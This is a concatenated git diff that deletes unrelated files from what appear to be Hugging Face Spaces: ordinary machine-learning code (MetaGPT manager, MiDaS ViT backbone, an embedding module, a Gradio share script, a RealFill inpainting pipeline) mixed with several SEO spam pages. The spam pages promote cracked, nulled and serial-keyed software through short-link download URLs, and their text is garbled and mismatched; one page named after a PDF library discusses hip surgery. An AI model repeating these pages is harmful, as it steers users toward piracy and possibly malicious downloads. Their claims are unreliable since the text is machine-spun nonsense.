+0,0 @@ -#!/usr/bin/env python -# -*- coding: utf-8 -*- -""" -@Time : 2023/5/11 14:42 -@Author : alexanderwu -@File : manager.py -""" -from metagpt.llm import LLM -from metagpt.logs import logger -from metagpt.schema import Message - - -class Manager: - def __init__(self, llm: LLM = LLM()): - self.llm = llm # Large Language Model - self.role_directions = { - "BOSS": "Product Manager", - "Product Manager": "Architect", - "Architect": "Engineer", - "Engineer": "QA Engineer", - "QA Engineer": "Product Manager" - } - self.prompt_template = """ - Given the following message: - {message} - - And the current status of roles: - {roles} - - Which role should handle this message? - """ - - async def handle(self, message: Message, environment): - """ - 管理员处理信息,现在简单的将信息递交给下一个人 - The administrator processes the information, now simply passes the information on to the next person - :param message: - :param environment: - :return: - """ - # Get all roles from the environment - roles = environment.get_roles() - # logger.debug(f"{roles=}, {message=}") - - # Build a context for the LLM to understand the situation - # context = { - # "message": str(message), - # "roles": {role.name: role.get_info() for role in roles}, - # } - # Ask the LLM to decide which role should handle the message - # chosen_role_name = self.llm.ask(self.prompt_template.format(context)) - - # FIXME: 现在通过简单的字典决定流向,但之后还是应该有思考过程 - #The direction of flow is now determined by a simple dictionary, but there should still be a thought process afterwards - next_role_profile = self.role_directions[message.role] - # logger.debug(f"{next_role_profile}") - for _, role in roles.items(): - if next_role_profile == role.profile: - next_role = role - break - else: - logger.error(f"No available role can handle message: {message}.") - return - - # Find the chosen role and handle the message - return await next_role.handle(message) diff --git a/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/Designmodo Startup 
Framework Nulled Cracking High Quality.md b/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/Designmodo Startup Framework Nulled Cracking High Quality.md deleted file mode 100644 index 3b1a731aa7d242e5b15a418188edaefbb74e5cbe..0000000000000000000000000000000000000000 --- a/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/Designmodo Startup Framework Nulled Cracking High Quality.md +++ /dev/null @@ -1,10 +0,0 @@ -

          we need your support to keep this project alive. we are in the process of building a cloud platform for startups around the globe. we are using this as a beta, and we want you to help us test it and make it better.


          the extensive range of problems include real world issues, coding challenges, code tests, and mock interviews. s. we are huge fans of google mock, we're here to help you. easily convert between markup and code files with the help of a dialog. designmodo startup framework nulled. startups designmodo startup framework nulled. you can see how the program works by following the step by step tutorial and writing your own code. at the end of the day, any client will tell you that they want a fast site, in order to keep their business.


          Designmodo Startup Framework Nulled Cracking


          DOWNLOAD ✒ ✒ ✒ https://cinurl.com/2uEXrH




          designmodo startup framework nulled cracking. how to crack a j. that's why, each time a new request is made, it's taken into the queue and processed one by one. all files are available for free to download as zip, rar, torrent, keygen, warez full version for windows.


          the small business owner is not interested in spending a few hours to put together a website, they are interested in getting the product or service delivered. designmodo startup framework nulled - enter your email address to subscribe to this blog and receive notifications of new posts by email.


          even after the upgrade the platform was still very usable. when i ask some of the people who are starting a new site what they are using, i am seeing more and more of them preferring this framework as an alternative to other cms systems.


          this is a 3d model of a game character. the pack contains 200 additional animations and 1. the pack can be used as a starting point for your own designs. crack-designmodo-startup-framework-nulled-io - designmodo startup framework nulled io logos 5 torrent download set.a.light 3d studio full crack software

          \ No newline at end of file diff --git a/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/EaseUS Data Recovery Crack Download Full Version __LINK__.md b/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/EaseUS Data Recovery Crack Download Full Version __LINK__.md deleted file mode 100644 index 113da98305e23e2848b6f78bf4857a4804cc97ec..0000000000000000000000000000000000000000 --- a/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/EaseUS Data Recovery Crack Download Full Version __LINK__.md +++ /dev/null @@ -1,9 +0,0 @@ -

          With EaseUS Data Recovery Crack you can recover your lost data easily. The software is an intuitive data recovery tool and doesn't require any technical skills or expertise to use. It can recover any type of data from any storage device, including files you have accidentally deleted, and it works on the Windows operating system. It lets you recover deleted files, folders, and partitions.


          EaseUS Data Recovery Crack Download Full Version


          Download Filehttps://cinurl.com/2uEY7G




          EaseUS Data Recovery Crack lets you recover lost files and folders from formatted hard drives and solid-state drives, and even from a damaged Windows operating system. It can also recover the partition table from different storage devices such as external hard disks, external solid-state drives, and USB drives.


          EaseUS Data Recovery Crack lets you recover data from damaged disks, damaged partitions, a corrupted Windows operating system, and even corrupted Microsoft Office files. It can handle any type of data on any storage device, including files you have accidentally deleted.


          EaseUS Data Recovery Crack is a powerful data recovery tool that can recover files and folders from damaged hard drives, damaged partitions, a corrupted Windows operating system, and even corrupted Microsoft Office files. It works with any storage device and supports multiple operating systems.


          \ No newline at end of file diff --git a/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/Korg Pa800 Set Armenianbfdcm ((BETTER)).md b/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/Korg Pa800 Set Armenianbfdcm ((BETTER)).md deleted file mode 100644 index c06ce0518a4ea9db8d20b007e64b9f2b4c07b35c..0000000000000000000000000000000000000000 --- a/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/Korg Pa800 Set Armenianbfdcm ((BETTER)).md +++ /dev/null @@ -1,6 +0,0 @@ -

          Korg pa800 set armenianbfdcm


          DOWNLOADhttps://cinurl.com/2uEYyY



          Korg pa800 set armenianbfdcm · Omega A Journey Through Timel · Generals Zero Hour Maps 8 Players 11l · Monitorizacion Hemodinamica ...

          diff --git a/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/Spire.PDF.for..NET.2.3.0.with.Serial.md b/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/Spire.PDF.for..NET.2.3.0.with.Serial.md deleted file mode 100644 index 218cf1b0afd4779bc0128a072ca3dd5679ed8cb6..0000000000000000000000000000000000000000 --- a/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/Spire.PDF.for..NET.2.3.0.with.Serial.md +++ /dev/null @@ -1,6 +0,0 @@ -

          Spire.PDF.for..NET.2.3.0.with.Serial


          DOWNLOAD ––– https://cinurl.com/2uEXcT



          PDF | Loss of bone stock is a major problem in revision surgery of the hip. Impaction ... The serial post-operative radiographs were assessed for.

          diff --git a/spaces/surmensipa/VITS-Umamusume-voice-synthesizer/logs/Activation Code For Euro Truck Simulator 1.3 [CRACKED].md b/spaces/surmensipa/VITS-Umamusume-voice-synthesizer/logs/Activation Code For Euro Truck Simulator 1.3 [CRACKED].md deleted file mode 100644 index c3da8480294befeeecde87563ac4ac55a62d6d2b..0000000000000000000000000000000000000000 --- a/spaces/surmensipa/VITS-Umamusume-voice-synthesizer/logs/Activation Code For Euro Truck Simulator 1.3 [CRACKED].md +++ /dev/null @@ -1,6 +0,0 @@ -

          Activation Code For Euro Truck Simulator 1.3


          Download Ziphttps://urluss.com/2uCHpo




          diff --git a/spaces/surmensipa/VITS-Umamusume-voice-synthesizer/logs/Arul Nool Tamil Pdf 233 BETTER.md b/spaces/surmensipa/VITS-Umamusume-voice-synthesizer/logs/Arul Nool Tamil Pdf 233 BETTER.md deleted file mode 100644 index ff2dfb0216903feadd5d396d481833a9ea0c3e40..0000000000000000000000000000000000000000 --- a/spaces/surmensipa/VITS-Umamusume-voice-synthesizer/logs/Arul Nool Tamil Pdf 233 BETTER.md +++ /dev/null @@ -1,6 +0,0 @@ -

          Arul Nool Tamil Pdf 233


          Download Filehttps://urluss.com/2uCE0c



          Krishna Yuddham. English. 132 pages (11.8 MB). Download PDF. Click on the above image to download Tamil Pada Nool in PDF format. Tamil Nattu Pada Nool pdf. DOWNLOAD (Mirror #1). Tamil Pada Nool. Damayanthi. Bagyanathan. Kanidham Karpithal.

          diff --git a/spaces/svjack/ControlNet-Pose-Chinese/annotator/midas/midas/vit.py b/spaces/svjack/ControlNet-Pose-Chinese/annotator/midas/midas/vit.py deleted file mode 100644 index ea46b1be88b261b0dec04f3da0256f5f66f88a74..0000000000000000000000000000000000000000 --- a/spaces/svjack/ControlNet-Pose-Chinese/annotator/midas/midas/vit.py +++ /dev/null @@ -1,491 +0,0 @@ -import torch -import torch.nn as nn -import timm -import types -import math -import torch.nn.functional as F - - -class Slice(nn.Module): - def __init__(self, start_index=1): - super(Slice, self).__init__() - self.start_index = start_index - - def forward(self, x): - return x[:, self.start_index :] - - -class AddReadout(nn.Module): - def __init__(self, start_index=1): - super(AddReadout, self).__init__() - self.start_index = start_index - - def forward(self, x): - if self.start_index == 2: - readout = (x[:, 0] + x[:, 1]) / 2 - else: - readout = x[:, 0] - return x[:, self.start_index :] + readout.unsqueeze(1) - - -class ProjectReadout(nn.Module): - def __init__(self, in_features, start_index=1): - super(ProjectReadout, self).__init__() - self.start_index = start_index - - self.project = nn.Sequential(nn.Linear(2 * in_features, in_features), nn.GELU()) - - def forward(self, x): - readout = x[:, 0].unsqueeze(1).expand_as(x[:, self.start_index :]) - features = torch.cat((x[:, self.start_index :], readout), -1) - - return self.project(features) - - -class Transpose(nn.Module): - def __init__(self, dim0, dim1): - super(Transpose, self).__init__() - self.dim0 = dim0 - self.dim1 = dim1 - - def forward(self, x): - x = x.transpose(self.dim0, self.dim1) - return x - - -def forward_vit(pretrained, x): - b, c, h, w = x.shape - - glob = pretrained.model.forward_flex(x) - - layer_1 = pretrained.activations["1"] - layer_2 = pretrained.activations["2"] - layer_3 = pretrained.activations["3"] - layer_4 = pretrained.activations["4"] - - layer_1 = pretrained.act_postprocess1[0:2](layer_1) - layer_2 = 
pretrained.act_postprocess2[0:2](layer_2) - layer_3 = pretrained.act_postprocess3[0:2](layer_3) - layer_4 = pretrained.act_postprocess4[0:2](layer_4) - - unflatten = nn.Sequential( - nn.Unflatten( - 2, - torch.Size( - [ - h // pretrained.model.patch_size[1], - w // pretrained.model.patch_size[0], - ] - ), - ) - ) - - if layer_1.ndim == 3: - layer_1 = unflatten(layer_1) - if layer_2.ndim == 3: - layer_2 = unflatten(layer_2) - if layer_3.ndim == 3: - layer_3 = unflatten(layer_3) - if layer_4.ndim == 3: - layer_4 = unflatten(layer_4) - - layer_1 = pretrained.act_postprocess1[3 : len(pretrained.act_postprocess1)](layer_1) - layer_2 = pretrained.act_postprocess2[3 : len(pretrained.act_postprocess2)](layer_2) - layer_3 = pretrained.act_postprocess3[3 : len(pretrained.act_postprocess3)](layer_3) - layer_4 = pretrained.act_postprocess4[3 : len(pretrained.act_postprocess4)](layer_4) - - return layer_1, layer_2, layer_3, layer_4 - - -def _resize_pos_embed(self, posemb, gs_h, gs_w): - posemb_tok, posemb_grid = ( - posemb[:, : self.start_index], - posemb[0, self.start_index :], - ) - - gs_old = int(math.sqrt(len(posemb_grid))) - - posemb_grid = posemb_grid.reshape(1, gs_old, gs_old, -1).permute(0, 3, 1, 2) - posemb_grid = F.interpolate(posemb_grid, size=(gs_h, gs_w), mode="bilinear") - posemb_grid = posemb_grid.permute(0, 2, 3, 1).reshape(1, gs_h * gs_w, -1) - - posemb = torch.cat([posemb_tok, posemb_grid], dim=1) - - return posemb - - -def forward_flex(self, x): - b, c, h, w = x.shape - - pos_embed = self._resize_pos_embed( - self.pos_embed, h // self.patch_size[1], w // self.patch_size[0] - ) - - B = x.shape[0] - - if hasattr(self.patch_embed, "backbone"): - x = self.patch_embed.backbone(x) - if isinstance(x, (list, tuple)): - x = x[-1] # last feature if backbone outputs list/tuple of features - - x = self.patch_embed.proj(x).flatten(2).transpose(1, 2) - - if getattr(self, "dist_token", None) is not None: - cls_tokens = self.cls_token.expand( - B, -1, -1 - ) # stole 
cls_tokens impl from Phil Wang, thanks - dist_token = self.dist_token.expand(B, -1, -1) - x = torch.cat((cls_tokens, dist_token, x), dim=1) - else: - cls_tokens = self.cls_token.expand( - B, -1, -1 - ) # stole cls_tokens impl from Phil Wang, thanks - x = torch.cat((cls_tokens, x), dim=1) - - x = x + pos_embed - x = self.pos_drop(x) - - for blk in self.blocks: - x = blk(x) - - x = self.norm(x) - - return x - - -activations = {} - - -def get_activation(name): - def hook(model, input, output): - activations[name] = output - - return hook - - -def get_readout_oper(vit_features, features, use_readout, start_index=1): - if use_readout == "ignore": - readout_oper = [Slice(start_index)] * len(features) - elif use_readout == "add": - readout_oper = [AddReadout(start_index)] * len(features) - elif use_readout == "project": - readout_oper = [ - ProjectReadout(vit_features, start_index) for out_feat in features - ] - else: - assert ( - False - ), "wrong operation for readout token, use_readout can be 'ignore', 'add', or 'project'" - - return readout_oper - - -def _make_vit_b16_backbone( - model, - features=[96, 192, 384, 768], - size=[384, 384], - hooks=[2, 5, 8, 11], - vit_features=768, - use_readout="ignore", - start_index=1, -): - pretrained = nn.Module() - - pretrained.model = model - pretrained.model.blocks[hooks[0]].register_forward_hook(get_activation("1")) - pretrained.model.blocks[hooks[1]].register_forward_hook(get_activation("2")) - pretrained.model.blocks[hooks[2]].register_forward_hook(get_activation("3")) - pretrained.model.blocks[hooks[3]].register_forward_hook(get_activation("4")) - - pretrained.activations = activations - - readout_oper = get_readout_oper(vit_features, features, use_readout, start_index) - - # 32, 48, 136, 384 - pretrained.act_postprocess1 = nn.Sequential( - readout_oper[0], - Transpose(1, 2), - nn.Unflatten(2, torch.Size([size[0] // 16, size[1] // 16])), - nn.Conv2d( - in_channels=vit_features, - out_channels=features[0], - kernel_size=1, - 
stride=1, - padding=0, - ), - nn.ConvTranspose2d( - in_channels=features[0], - out_channels=features[0], - kernel_size=4, - stride=4, - padding=0, - bias=True, - dilation=1, - groups=1, - ), - ) - - pretrained.act_postprocess2 = nn.Sequential( - readout_oper[1], - Transpose(1, 2), - nn.Unflatten(2, torch.Size([size[0] // 16, size[1] // 16])), - nn.Conv2d( - in_channels=vit_features, - out_channels=features[1], - kernel_size=1, - stride=1, - padding=0, - ), - nn.ConvTranspose2d( - in_channels=features[1], - out_channels=features[1], - kernel_size=2, - stride=2, - padding=0, - bias=True, - dilation=1, - groups=1, - ), - ) - - pretrained.act_postprocess3 = nn.Sequential( - readout_oper[2], - Transpose(1, 2), - nn.Unflatten(2, torch.Size([size[0] // 16, size[1] // 16])), - nn.Conv2d( - in_channels=vit_features, - out_channels=features[2], - kernel_size=1, - stride=1, - padding=0, - ), - ) - - pretrained.act_postprocess4 = nn.Sequential( - readout_oper[3], - Transpose(1, 2), - nn.Unflatten(2, torch.Size([size[0] // 16, size[1] // 16])), - nn.Conv2d( - in_channels=vit_features, - out_channels=features[3], - kernel_size=1, - stride=1, - padding=0, - ), - nn.Conv2d( - in_channels=features[3], - out_channels=features[3], - kernel_size=3, - stride=2, - padding=1, - ), - ) - - pretrained.model.start_index = start_index - pretrained.model.patch_size = [16, 16] - - # We inject this function into the VisionTransformer instances so that - # we can use it with interpolated position embeddings without modifying the library source. 
- pretrained.model.forward_flex = types.MethodType(forward_flex, pretrained.model) - pretrained.model._resize_pos_embed = types.MethodType( - _resize_pos_embed, pretrained.model - ) - - return pretrained - - -def _make_pretrained_vitl16_384(pretrained, use_readout="ignore", hooks=None): - model = timm.create_model("vit_large_patch16_384", pretrained=pretrained) - - hooks = [5, 11, 17, 23] if hooks == None else hooks - return _make_vit_b16_backbone( - model, - features=[256, 512, 1024, 1024], - hooks=hooks, - vit_features=1024, - use_readout=use_readout, - ) - - -def _make_pretrained_vitb16_384(pretrained, use_readout="ignore", hooks=None): - model = timm.create_model("vit_base_patch16_384", pretrained=pretrained) - - hooks = [2, 5, 8, 11] if hooks == None else hooks - return _make_vit_b16_backbone( - model, features=[96, 192, 384, 768], hooks=hooks, use_readout=use_readout - ) - - -def _make_pretrained_deitb16_384(pretrained, use_readout="ignore", hooks=None): - model = timm.create_model("vit_deit_base_patch16_384", pretrained=pretrained) - - hooks = [2, 5, 8, 11] if hooks == None else hooks - return _make_vit_b16_backbone( - model, features=[96, 192, 384, 768], hooks=hooks, use_readout=use_readout - ) - - -def _make_pretrained_deitb16_distil_384(pretrained, use_readout="ignore", hooks=None): - model = timm.create_model( - "vit_deit_base_distilled_patch16_384", pretrained=pretrained - ) - - hooks = [2, 5, 8, 11] if hooks == None else hooks - return _make_vit_b16_backbone( - model, - features=[96, 192, 384, 768], - hooks=hooks, - use_readout=use_readout, - start_index=2, - ) - - -def _make_vit_b_rn50_backbone( - model, - features=[256, 512, 768, 768], - size=[384, 384], - hooks=[0, 1, 8, 11], - vit_features=768, - use_vit_only=False, - use_readout="ignore", - start_index=1, -): - pretrained = nn.Module() - - pretrained.model = model - - if use_vit_only == True: - pretrained.model.blocks[hooks[0]].register_forward_hook(get_activation("1")) - 
pretrained.model.blocks[hooks[1]].register_forward_hook(get_activation("2")) - else: - pretrained.model.patch_embed.backbone.stages[0].register_forward_hook( - get_activation("1") - ) - pretrained.model.patch_embed.backbone.stages[1].register_forward_hook( - get_activation("2") - ) - - pretrained.model.blocks[hooks[2]].register_forward_hook(get_activation("3")) - pretrained.model.blocks[hooks[3]].register_forward_hook(get_activation("4")) - - pretrained.activations = activations - - readout_oper = get_readout_oper(vit_features, features, use_readout, start_index) - - if use_vit_only == True: - pretrained.act_postprocess1 = nn.Sequential( - readout_oper[0], - Transpose(1, 2), - nn.Unflatten(2, torch.Size([size[0] // 16, size[1] // 16])), - nn.Conv2d( - in_channels=vit_features, - out_channels=features[0], - kernel_size=1, - stride=1, - padding=0, - ), - nn.ConvTranspose2d( - in_channels=features[0], - out_channels=features[0], - kernel_size=4, - stride=4, - padding=0, - bias=True, - dilation=1, - groups=1, - ), - ) - - pretrained.act_postprocess2 = nn.Sequential( - readout_oper[1], - Transpose(1, 2), - nn.Unflatten(2, torch.Size([size[0] // 16, size[1] // 16])), - nn.Conv2d( - in_channels=vit_features, - out_channels=features[1], - kernel_size=1, - stride=1, - padding=0, - ), - nn.ConvTranspose2d( - in_channels=features[1], - out_channels=features[1], - kernel_size=2, - stride=2, - padding=0, - bias=True, - dilation=1, - groups=1, - ), - ) - else: - pretrained.act_postprocess1 = nn.Sequential( - nn.Identity(), nn.Identity(), nn.Identity() - ) - pretrained.act_postprocess2 = nn.Sequential( - nn.Identity(), nn.Identity(), nn.Identity() - ) - - pretrained.act_postprocess3 = nn.Sequential( - readout_oper[2], - Transpose(1, 2), - nn.Unflatten(2, torch.Size([size[0] // 16, size[1] // 16])), - nn.Conv2d( - in_channels=vit_features, - out_channels=features[2], - kernel_size=1, - stride=1, - padding=0, - ), - ) - - pretrained.act_postprocess4 = nn.Sequential( - 
readout_oper[3], - Transpose(1, 2), - nn.Unflatten(2, torch.Size([size[0] // 16, size[1] // 16])), - nn.Conv2d( - in_channels=vit_features, - out_channels=features[3], - kernel_size=1, - stride=1, - padding=0, - ), - nn.Conv2d( - in_channels=features[3], - out_channels=features[3], - kernel_size=3, - stride=2, - padding=1, - ), - ) - - pretrained.model.start_index = start_index - pretrained.model.patch_size = [16, 16] - - # We inject this function into the VisionTransformer instances so that - # we can use it with interpolated position embeddings without modifying the library source. - pretrained.model.forward_flex = types.MethodType(forward_flex, pretrained.model) - - # We inject this function into the VisionTransformer instances so that - # we can use it with interpolated position embeddings without modifying the library source. - pretrained.model._resize_pos_embed = types.MethodType( - _resize_pos_embed, pretrained.model - ) - - return pretrained - - -def _make_pretrained_vitb_rn50_384( - pretrained, use_readout="ignore", hooks=None, use_vit_only=False -): - model = timm.create_model("vit_base_resnet50_384", pretrained=pretrained) - - hooks = [0, 1, 8, 11] if hooks == None else hooks - return _make_vit_b_rn50_backbone( - model, - features=[256, 512, 768, 768], - size=[384, 384], - hooks=hooks, - use_vit_only=use_vit_only, - use_readout=use_readout, - ) diff --git a/spaces/szukevin/VISOR-GPT/train/tencentpretrain/embeddings/embedding.py b/spaces/szukevin/VISOR-GPT/train/tencentpretrain/embeddings/embedding.py deleted file mode 100644 index 15fab2ea58fb9d07024b70097f27f83d0decd740..0000000000000000000000000000000000000000 --- a/spaces/szukevin/VISOR-GPT/train/tencentpretrain/embeddings/embedding.py +++ /dev/null @@ -1,34 +0,0 @@ -import torch.nn as nn -import torch -from tencentpretrain.layers.layer_norm import LayerNorm - - -class Embedding(nn.Module): - def __init__(self, args): - super(Embedding, self).__init__() - self.embedding_name_list = [] - self.dropout = 
    nn.Dropout(args.dropout) - self.remove_embedding_layernorm = args.remove_embedding_layernorm - if not self.remove_embedding_layernorm and "dual" not in args.embedding: - self.layer_norm = LayerNorm(args.emb_size) - - def update(self, embedding, embedding_name): - setattr(self, embedding_name, embedding) - self.embedding_name_list.append(embedding_name) - - def forward(self, src, seg): - if self.embedding_name_list[0] == "dual": - return self.dual(src, seg) - - for i, embedding_name in enumerate(self.embedding_name_list): - embedding = getattr(self, embedding_name) - - if i == 0: - emb = embedding(src, seg) - else: - emb += embedding(src, seg) - - if not self.remove_embedding_layernorm: - emb = self.layer_norm(emb) - emb = self.dropout(emb) - return emb diff --git a/spaces/teganmosi/codellama-playground/share_btn.py b/spaces/teganmosi/codellama-playground/share_btn.py deleted file mode 100644 index 2587a360a189c4cc488d23b48c3cf1ca7151b04c..0000000000000000000000000000000000000000 --- a/spaces/teganmosi/codellama-playground/share_btn.py +++ /dev/null @@ -1,112 +0,0 @@ -community_icon_html = """""" - -loading_icon_html = """""" - -share_js = """async () => { - async function uploadFile(file){ - const UPLOAD_URL = 'https://huggingface.co/uploads'; - const response = await fetch(UPLOAD_URL, { - method: 'POST', - headers: { - 'Content-Type': file.type, - 'X-Requested-With': 'XMLHttpRequest', - }, - body: file, /// <- File inherits from Blob - }); - const url = await response.text(); - return url; - } - - async function getInputImgFile(imgEl){ - const res = await fetch(imgEl.src); - const blob = await res.blob(); - const imgId = Date.now() % 200; - const isPng = imgEl.src.startsWith(`data:image/png`); - if(isPng){ - const fileName = `sd-perception-${imgId}.png`; - return new File([blob], fileName, { type: 'image/png' }); - }else{ - const fileName = `sd-perception-${imgId}.jpg`; - return new File([blob], fileName, { type: 'image/jpeg' }); - } - } - - // const gradioEl 
    
= document.querySelector('body > gradio-app'); - const gradioEl = document.querySelector("gradio-app"); - const inputTxt = gradioEl.querySelector('#q-input textarea').value; - let outputTxt = gradioEl.querySelector('#q-output .codemirror-wrapper .cm-scroller > div:nth-of-type(2)').innerText; - outputTxt = `
          ${outputTxt}
          ` - - const titleLength = 150; - let titleTxt = inputTxt; - if(titleTxt.length > titleLength){ - titleTxt = titleTxt.slice(0, titleLength) + ' ...'; - } - - const shareBtnEl = gradioEl.querySelector('#share-btn'); - const shareIconEl = gradioEl.querySelector('#share-btn-share-icon'); - const loadingIconEl = gradioEl.querySelector('#share-btn-loading-icon'); - - if(!inputTxt || !outputTxt){ - return; - }; - - shareBtnEl.style.pointerEvents = 'none'; - shareIconEl.style.display = 'none'; - loadingIconEl.style.removeProperty('display'); - - const descriptionMd = `### Question: -${inputTxt} - -### Answer: - -${outputTxt}`; - - const params = { - title: titleTxt, - description: descriptionMd, - }; - - const paramsStr = Object.entries(params) - .map(([key, value]) => `${encodeURIComponent(key)}=${encodeURIComponent(value)}`) - .join('&'); - - window.open(`https://huggingface.co/spaces/bigcode/bigcode-playground/discussions/new?${paramsStr}`, '_blank'); - - shareBtnEl.style.removeProperty('pointer-events'); - shareIconEl.style.removeProperty('display'); - loadingIconEl.style.display = 'none'; -}""" - -share_btn_css = """ -a {text-decoration-line: underline; font-weight: 600;} -.animate-spin { - animation: spin 1s linear infinite; -} -@keyframes spin { - from { transform: rotate(0deg); } - to { transform: rotate(360deg); } -} -#share-btn-container { - display: flex; padding-left: 0.5rem !important; padding-right: 0.5rem !important; background-color: #000000; justify-content: center; align-items: center; border-radius: 9999px !important; width: 13rem; -} -#share-btn { - all: initial; color: #ffffff;font-weight: 600; cursor:pointer; font-family: 'IBM Plex Sans', sans-serif; margin-left: 0.5rem !important; padding-top: 0.25rem !important; padding-bottom: 0.25rem !important; -} -#share-btn * { - all: unset; -} -#share-btn-container div:nth-child(-n+2){ - width: auto !important; - min-height: 0px !important; -} -#share-btn-container .wrap { - display: none !important; 
-} -""" \ No newline at end of file diff --git a/spaces/terfces0erbo/CollegeProjectV2/FiatEcuScan 2.6.2 Cracked.rar.md b/spaces/terfces0erbo/CollegeProjectV2/FiatEcuScan 2.6.2 Cracked.rar.md deleted file mode 100644 index b8d9063f92458522f6fd39ea92c70b563ecf601b..0000000000000000000000000000000000000000 --- a/spaces/terfces0erbo/CollegeProjectV2/FiatEcuScan 2.6.2 Cracked.rar.md +++ /dev/null @@ -1,8 +0,0 @@ -

          FiatEcuScan 2.6.2 Cracked.rar


          DOWNLOAD >>> https://bytlly.com/2uGl8S



          -
    
          -
          -
          -

    diff --git a/spaces/thuanz123/peft-sd-realfill/inference.py b/spaces/thuanz123/peft-sd-realfill/inference.py deleted file mode 100644 index 9bed6b7d12c1a85e855e058f5b9a1d3410faa776..0000000000000000000000000000000000000000 --- a/spaces/thuanz123/peft-sd-realfill/inference.py +++ /dev/null @@ -1,63 +0,0 @@ -from __future__ import annotations - -import gc -import json -import pathlib -import sys - -import gradio as gr -import PIL.Image -import PIL.ImageFilter -import torch -from diffusers import StableDiffusionInpaintPipeline - - -class InferencePipeline: - def __init__(self): - self.pipe = None - self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") - - def clear(self) -> None: - del self.pipe - self.pipe = None - torch.cuda.empty_cache() - gc.collect() - - def load_pipe(self, realfill_model: str) -> None: - pipe = StableDiffusionInpaintPipeline.from_pretrained( - realfill_model, torch_dtype=torch.float16 - ).to(self.device) - self.pipe = pipe - - def run( - self, - realfill_model: str, - target_image: PIL.Image, - target_mask: PIL.Image, - seed: int, - n_steps: int, - guidance_scale: float, - ) -> PIL.Image.Image: - if not torch.cuda.is_available(): - raise gr.Error("CUDA is not available.") - - self.load_pipe(realfill_model) - - image = PIL.Image.open(target_image) - mask_image = PIL.Image.open(target_mask) - - generator = torch.Generator(device=self.device).manual_seed(seed) - out = self.pipe( - "a photo of sks", - image=image, - mask_image=mask_image, - num_inference_steps=n_steps, - guidance_scale=guidance_scale, - generator=generator, - ).images[0] # type: ignore - - # MaxFilter slightly expands the white mask region so the blend covers the inpainted border. - erode_kernel = PIL.ImageFilter.MaxFilter(3) - mask_image = mask_image.filter(erode_kernel) - - # Keep generated pixels inside the mask, original pixels outside it. - result = PIL.Image.composite(out, image, mask_image) - return result diff --git a/spaces/tialenAdioni/chat-gpt-api/logs/Autodesk Inventor CAM Ultimate 2020 Torrent UPD.md b/spaces/tialenAdioni/chat-gpt-api/logs/Autodesk Inventor CAM Ultimate 2020 Torrent UPD.md 
    
deleted file mode 100644 index 3a30cc1c91c8e97a184cf9d98d4d4684d2c359d1..0000000000000000000000000000000000000000 --- a/spaces/tialenAdioni/chat-gpt-api/logs/Autodesk Inventor CAM Ultimate 2020 Torrent UPD.md +++ /dev/null @@ -1,29 +0,0 @@ -
          -

          How to Download Autodesk Inventor CAM Ultimate 2020 for Free

          -

    Autodesk Inventor CAM Ultimate 2020 is powerful software that simplifies the machining workflow with CAD-embedded 2.5-axis to 5-axis milling, turning, and mill-turn capabilities. It also offers an advanced roughing strategy that efficiently removes a high volume of material while minimizing tool and machine wear.
    

          -

          Autodesk Inventor CAM Ultimate 2020 Torrent


          Download Zip ->>->>->> https://urlcod.com/2uK7Qv



          -

    If you want to download Autodesk Inventor CAM Ultimate 2020 for free, you might be tempted to use a torrent site. However, this is not recommended for several reasons. First, torrent sites are often unsafe and may distribute malware or viruses that can harm your computer. Second, downloading pirated software is illegal and may expose you to legal risks or penalties. Third, torrents may not offer the latest version or the complete feature set of the software.
    

          -

          The best way to download Autodesk Inventor CAM Ultimate 2020 for free is to use the official website of Autodesk. Autodesk offers a free trial of the software for 30 days, which allows you to test its functionality and performance before buying it. You can also access online tutorials, videos, and support from Autodesk experts during the trial period.

          -

          To download Autodesk Inventor CAM Ultimate 2020 for free from Autodesk, follow these steps:

          -
            -
          1. Go to https://www.autodesk.com/products/inventor-cam/overview and click on "Download free trial".
          2. -
          3. Sign in with your Autodesk account or create one if you don't have one.
          4. -
          5. Select your operating system, language, and version (64-bit).
          6. -
          7. Click on "Install now" and follow the instructions to install the software on your computer.
          8. -
          9. Launch the software and activate it with your Autodesk account.
          10. -
          -

          You can now enjoy Autodesk Inventor CAM Ultimate 2020 for free for 30 days. If you decide to buy the software after the trial period, you can do so from the same website.

          - -

    Autodesk Inventor CAM Ultimate 2020 is a comprehensive solution for CNC machining. It integrates seamlessly with Autodesk Inventor, 3D CAD software that lets you design and model complex parts and assemblies. You can use the same interface and data to create toolpaths, simulate operations, and generate G-code for your CNC machines.
    

          -

          -

          With Autodesk Inventor CAM Ultimate 2020, you can take advantage of various features and benefits, such as:

          -
            -
          • Adaptive clearing: a high-efficiency roughing strategy that reduces cycle time and tool wear by maintaining a constant tool load.
          • -
          • 3D contouring: a finishing strategy that creates smooth and accurate surfaces with minimal retractions and sharp corners.
          • -
          • 5-axis simultaneous machining: a multi-axis strategy that enables you to machine complex shapes and features with a single setup.
          • -
          • Turning and mill-turn: a complete solution for turning and mill-turn operations that supports live tooling, sub-spindles, and multiple turrets.
          • -
          • Post processor library: a collection of ready-to-use post processors for various CNC machines and controllers.
          • -
          -

          Autodesk Inventor CAM Ultimate 2020 is compatible with Windows 10 (64-bit) and requires Autodesk Inventor 2020 or later. It also requires a minimum of 8 GB of RAM, 40 GB of disk space, and a graphics card with 1 GB of VRAM.

          e93f5a0c3f
          -
          -
